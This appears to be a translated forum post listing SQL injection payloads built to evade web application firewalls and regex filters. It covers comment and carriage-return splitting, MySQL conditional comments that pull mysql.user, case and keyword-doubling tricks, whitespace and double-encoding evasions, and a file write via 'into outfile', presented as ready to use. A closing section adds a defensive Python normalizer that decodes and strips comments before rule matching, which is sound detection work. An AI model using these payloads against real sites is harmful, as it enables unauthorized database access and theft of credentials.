Saw this on a foreign X forum. Not translating it, I can't read Russian either, so I wouldn't know how.
Just look at the injection statements, that's enough; as long as they bypass in testing, they're good stuff.
Comments + carriage return %0D%0A
Code:
http://www.modsecurity.org/testphp.vulnweb.com/artists.php?artist=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
URL-decoded variant:
Code:
http://www.modsecurity.org/testphp.vulnweb.com/artists.php?artist=0+div+1+union#foo*/*bar
select#foo
1,2,current_user
Combining comments and control characters (carriage return %0D%0A). Dropping the comments, we get a query of the form:
Code:
0 div 1 union select 1,2,current_user
Technique: Unterminated Comments + MySQL Comment Extensions for conditional code execution.
Code:
hUserId=22768&FromDate=1&ToDate=1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-&sendbutton1=Get+Statement
Code:
/*! MySQL-specific code */
Quote:
In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement, but other SQL servers will ignore the extensions.
Inside such a comment you can specify execution conditions, for example:
Code:
CREATE /*!32302 TEMPORARY */ TABLE t (a INT);
TEMPORARY: the construct is used on servers whose version is 3.23.02 or higher.
Related links:
8 examples (in English) of how mod_sec rules were bypassed back in the day: https://www.trustwave.com/Resources/SpiderLabs-Blog/ModSecurity-SQL-Injection-Challenge--Lessons-Learned/
Mod_Security Bypass Login (CRS, SQL Injection) http://software-talk.org/blog/2015/02/mod_security-bypass-login-sql-injection/
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/37
Other PHP Filters
Interesting examples of bypassing various filters based on poorly thought-out regular expressions.
Bypassing the and, or filter
Code:
PHP filter code: preg_match('/(and|or)/i', $id)
Filtered injection: 1 or 1 = 1
Filtered injection: 1 and 1 = 1
Bypassed injection: 1 || 1 = 1
Bypassed injection: 1 && 1 = 1
Bypassing and, or, union
Code:
PHP filter code: preg_match('/(and|or|union)/i', $id)
Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassing the where filter
Code:
Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'
Bypassing the limit filter
Code:
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassing the group by filter
Code:
PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
Bypassing the select filter
Code:
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Filtered injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'
Bypassing the ' (single quote) filter
Code:
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Filtered injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)
Bypassing the hex filter
Code:
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassing the substr filter
Code:
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)
Bypassing the whitespace (space) filter
Code:
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Filtered injection: 1 || lpad(user,7,1)
Bypassed injection: 1%0b||%0blpad(user,7,1)
More variants:
Code:
+, %2B, %20, %09, %0d, %0A, /**/, /*tuns*/
Bypassing the "=" (equals sign) filter
Code:
script.php?par=1 and substring(Version(),1,1)like(5)
script.php?par=1 and substring(Version(),1,1)not in(4,3)
script.php?par=1 and substring(Version(),1,1)in(4,3)
Bypass Web Application Firewall (WAF)
Inserting comments into keywords
Code:
http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--
Bypassing case-sensitive filters
Code:
http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--
Non-recursive filters:
Code:
http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
Double URL-Encode
Code:
http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/us
The following WAF:
Sucuri WebSite Firewall - CloudProxy - Access Denied
What is going on?
You are not allowed to access the requested page. If you are the site owner, please open a ticket in our support page if you think it was caused by an error: https://support.sucuri.net. If you are not the owner of the web site, you can contact us at soc@sucuri.net. Also make sure to include the block details (displayed below), so we can better troubleshoot the error.
Block details
Your IP: [ip]
URL: [url]
Your Browser: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Block ID: SQLi71
Block reason: SQL injection was detected and blocked.
Time: Tue, 24 Feb 2015 18:24:19 -0500
Server ID: cp93
Bypassed like this: union/*123*/select
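Every trick in this post (comments plus %0D%0A, the unterminated /*!0 conditional comment, %0b instead of a space, UnIoN/**/SeLecT, the union/*123*/select that got past the block page) works because the rule looks at the raw parameter. As an added defender-side example, not from the original post or from any WAF vendor, this Python canonicalizer decodes the value repeatedly, resolves comments the way MySQL's lexer does, and folds every separator to one space before matching; the `union\s+select` rule is an assumed stand-in for a single-line keyword rule, not ModSecurity's or Sucuri's signature.

```python
import re
from urllib.parse import unquote_plus

# Assumed stand-in for the single-line keyword rules the bypasses target;
# it only fires when the two keywords are separated by real whitespace.
NAIVE_RULE = re.compile(r"union\s+select", re.I)

# One pass of comment handling, leftmost match first, as MySQL's lexer scans:
#   /*!NNNNN body */  conditional comment: the body is executed, so it is kept
#   /* ... */         ordinary comment, terminated or running to end of input
#   # ... and -- ...  line comments, ended by the CR/LF that %0D%0A injects
COMMENT_RE = re.compile(
    r"/\*!\d*(?P<body>.*?)(?:\*/|$)"
    r"|/\*.*?(?:\*/|$)"
    r"|(?:#|--[ \t]).*?(?=\r?\n|$)",
    re.S,
)


def normalize(value: str, max_rounds: int = 8) -> str:
    """Canonical form of one request parameter for signature matching."""
    s = value
    # repeated decoding undoes double URL encoding (%252f -> %2f -> /)
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    # the unterminated /*!0 trick nests comments, so strip until stable
    for _ in range(max_rounds):
        stripped = COMMENT_RE.sub(lambda m: " %s " % (m.group("body") or ""), s)
        if stripped == s:
            break
        s = stripped
    # every separator MySQL accepts (space, tab, CR, LF, VT via %0b) becomes one space
    return re.sub(r"\s+", " ", s).strip().lower()


def naive_hit(value: str) -> bool:
    """What a rule applied to the raw parameter sees."""
    return NAIVE_RULE.search(value) is not None


def normalized_hit(value: str) -> bool:
    """The same rule after canonicalization."""
    return NAIVE_RULE.search(normalize(value)) is not None


if __name__ == "__main__":
    # constructed from the payloads quoted in the post above
    for p in ("0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user",
              "1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-",
              "union/*123*/select"):
        print(naive_hit(p), normalized_hit(p), normalize(p))
```

Comments are replaced by a space because MySQL starts a new token after one; a rule that wants to catch a keyword split across a comment has to allow that gap itself.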